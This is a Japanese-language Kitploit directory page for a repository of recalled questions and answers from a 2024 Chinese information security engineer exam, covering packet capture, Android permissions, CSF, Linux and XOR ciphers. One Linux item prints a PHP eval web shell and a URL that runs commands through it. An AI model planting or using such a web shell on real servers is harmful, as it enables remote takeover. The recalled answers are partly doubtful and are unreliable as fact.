Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
2024InformationSecurityEngineer — 2024年信息安全工程师、2024InformationSecurityEngineer | Kitploit
ツール/GitHubGitHub/jas502n/2024informationsecurityengineer
Android SecurityEncryption/Decryption ToolsNetwork SecurityLearning & EducationCurated ResourcesLearning Paths & CoursesLabs & Practice
GitHubjas502n/2024informationsecurityengineer

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

2024InformationSecurityEngineer

2024年信息安全工程师、2024InformationSecurityEngineer

リポジトリを見る
11年前未レビュー

2024InformationSecurityEngineer

2024年情報セキュリティエンジニア、2024InformationSecurityEngineer

2024年下半期-情報セキュリティエンジニア

例題の回想

软考-試験日時 : 2024年11月08日

一、ファイアウォールのパケットキャプチャ(14点)

  1. パケット長___(2点) 答:63
  2. 実機か仮想マシンか___(2点) 答:仮想マシン
  3. コントロールホストのIPとポート___(2点) 答:192.168.1.218 14444
  4. WiresharkでのIP、ポートのフィルタリングルール___(2点) 答:ip.addr == 192.168.2.105 and tcp.dstport == 14444
  5. コントロールホストが使用したコマンド(2点) 答:ipconfig
  6. Windowsでファイアウォールを表示するショートカット___(2点) 答:firewall.cpl
  7. どのオプションか___(2点)答:カスタマイズ

二、Android問題(16点)

  1. 署名を格納するディレクトリ/ファイル___(2点) 答:META-INF

  2. 権限を格納するディレクトリ/ファイル___(2点) 答:AndroidManifest.xml

  3. 問題5(10点) (1)どの設定がバックアップをサポートするか; (2)履歴の位置情報を読み取ることができるが、セキュリティ上のリスクがあるか; (3)設定ファイルの中で、四大コンポーネントのうちどれが使用されているか; (4)どのコンポーネントの情報漏えいリスクが最も高いか; (5)情報の濫用はあるか?詳しく説明せよ;

    答: (1)backup...... バックアップをサポートしない (2)リスクがある。未知の情報が漏えいする危険性がある (3)Activity、BroadcastRecevier (4)Contentprovider (5)情報の濫用はある。位置権限、カメラ権限、ストレージ権限、連絡先、マルチメディア、Bluetoothなどの権限が多く、過剰に収集されている

  4. Android内のユーザーにroot権限があるか(2点) 答:なし

三、CSF(11点)

  1. どのセキュリティモデルか___(2点) 答:PDRR
  2. 不明
  3. ファイアウォールはどのコア機能か___(2点) 答:保護
  4. 2問(4点) (1)CSFにはPDRRと比べてどのコア機能が多いか___(2点)答:識別 (2)リスク評価はCSFのどの機能に該当するか___(2点)答:識別
  5. 資産識別以外に、他にどの3つの識別があるか___(3点) 答:リスク識別;脆弱性識別;既存のセキュリティ対策の識別

四、Linux(13点)

  1. llの正式名称___(2点)答:ls -l

  2. 現在はrootか一般ユーザーか___(2点) 答:root

  3. ファイル権限の数字表現___(2点)答:rw-r--r-- 644

  4. 図中の../は何を意味するか___(2点)答:上位ディレクトリ、/var/www/html

  5. Linuxに標準搭載されているハッシュ値を計算するコマンド___(2点)md5sum; sha1sum; shasum -a 256

  6. shell.php <?php @eval($_GET["cmd"]); ?> (5点)

  1. このファイルに対応する接続パスワードは何か 答:cmd
  2. HTTPのどのリクエストメソッドか 答:GET
  3. ドメイン名がabc.comだと仮定した場合、whoamiを実行する完全なリクエストURL 答:abc.com/shell.php?cmd=system("whoami")

五、暗号化(15点)

  1. 対称と非対称の他に、平文の処理方式に基づいてどのように暗号化できるか(2点) 答:ブロック暗号とストリーム暗号
  2. aの8ビット(2点) 答:97 ---》 01100001
  3. aとabcのXOR暗号化の結果(6点) 答:032 または 00000000 00000011 00000010
  4. mi, ki, ciが与えられたとき、平文を求める式はどのようになるか(2点) 答:mi = ki 排他的論理和(XOR)^ ci
  5. 異なる2つの平文を同じストリーム暗号鍵で暗号化するのは安全か?なぜか?(2点) 答:安全ではない。一方の平文からもう一方の平文を導き出せる
  6. ブロック暗号はストリーム暗号を使用できるか(1点) 答:使用できる
ツールをダウンロード